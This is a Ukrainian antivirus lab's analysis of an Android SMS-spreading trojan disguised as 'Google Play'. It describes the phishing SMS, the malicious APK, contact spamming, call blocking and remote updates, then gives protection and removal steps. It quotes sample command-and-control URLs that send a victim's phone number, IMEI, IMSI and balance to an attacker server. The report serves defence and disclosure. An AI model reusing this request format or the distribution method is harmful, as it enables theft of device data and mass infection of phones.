Trojan.SMSSend.Android
Антивірусна лабораторія Zillya! провела дослідження атаки на смартфони українців, про яку 1 вересня повідомив ресурс zik.ua і виявила наступне.
Загальний опис
Троянська програма для мобільних телефонів, що працюють на базі операційної системи Android. На момент проведення даного дослідження отримані масові сигнали від постраждалих користувачів в Україні, Росії та Білорусії.
Метод розповсюдження
Користувач отримує SMS повідомлення виду «Привіт J Тобі фото https: //www.soloboro.ru/gayn/ ????????????» де замість знаків запитань вказаний телефон користувача, якому адресовано повідомлення.
При цьому посилання на сайт може бути іншим (нами зафіксовано як мінімум три різних сайта, на які вели посилання).
При спробі відкрити повідомлення, на телефон завантажується файл FOTO_ALBOM.apk і запускається установка троянського додатка. При цьому система запитує у користувача дозвіл на доступ даного додатка до конфіденційних даних. У разі позитивної відповіді користувача в систему встановлюється троянський додаток.
Після установки в системі з'являється додаток «Google Play» розміром близько 200 Кб, що є троянської програмою Trojan.SMSSend.Android. Його дуже легко переплутати з системним додатком «Google Play Маркет», на що зловмисниками і була зроблена ставка.
Троян отримує доступ до адресної книги пристрою і починає розсилку вірусних СМС всім адресатам, крім тих, чиї номери починаються на 1 (міжнародний телефонний код США = +1). Дана процедура повторюється троянської програмою регулярно, тому користувачі отримують по кілька вірусних СМС з одного і того ж зараженого телефону.
Шкідливі функції
В першу чергу, троян передає базову інформацію про пристрій користувача на свій сервер: номер телефону, IMEI, IMSI, країну, версію операційної системи, модель апарату, стан мобільного рахунку та інші дані. При цьому троян здатний аналізувати повідомлення від оператора про поповнення рахунок на конкретну суму, де аналізуються російськомовні повідомлення, що містять слова «баланс» і «пополнено», як російськими, так і латинськими символами.
Приклади запитів, що передають інформацію про телефон:
https://goldfan.ru/bs/r.php/country=ua&phone=380632330522&op=Android&balance=0&k=12ge5vr9&imei=289212345678901&imsi=123456789012345&os=4.0.2&sdk=15&model=samsungNexusS&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/g.php/imei=289212345678901&balance=0&k=12ge5vr9&time=2012-11-14 16:22:56&v=4
https://goldfan.ru/bs/s.php/id=4&imei=289212345678901&time=2012-11-14 16:22:56&v=4
Однією з функцій троянської програми є перехоплення вхідних дзвінків і вхідних СМС. Вхідні дзвінки абонементу автоматично скидаються, позбавляючи можливості інших користувачів додзвонитися до зараженого абоненту і попередити його про розсилання з його телефону повідомленнь.
Троян має функцію завантаження з Internet інших компонентів і встановлення їх у систему. Таким чином, у зловмисників завжди залишається можливість оновити функціональність троянської програми, що дає нам підстави припустити, що дана троянська програма є всього лише «транспортним механізмом» для більш складної і небезпечної троянської програми, яка може роздаватися адресно, конкретним абонентам. При цьому завантажена програма зберігається з ім'ям /mnt/sdcard/download/update.apk і запускається на установку автоматично.
Методи захисту
Даний троянський додаток може встановитися на пристрій тільки в тому випадку, якщо в його налаштуваннях безпеки включений параметр «Дозволити установку додатків з невідомих джерел». За замовчуванням цей параметр вимкнений на всіх пристроях, і включають його, як правило, для того що б встановити додатки з яких або джерел крім «Google Play Market» (наприклад з SD карти або іншого сайту).
Таким чином, основний метод захисту — це всього лише вимкнення параметра «Дозволити установку додатків з невідомих джерел» в налаштуваннях смартфона.
Інструкція по видаленню
Перш за все, необхідно зупинити роботу програми «Google Play» (скористатися «Диспетчером завдань» або «Диспетчером додатків») і потім виконати його видалення звичайним способом. Інструкція з видалення на офіційному сайті Google: https://support.google.com/googleplay/answer/2521768?hl=ru
Також необхідно видалити інсталяційний файл вірусу, який завантажується на телефон під ім'ям FOTO_ALBOM.apk.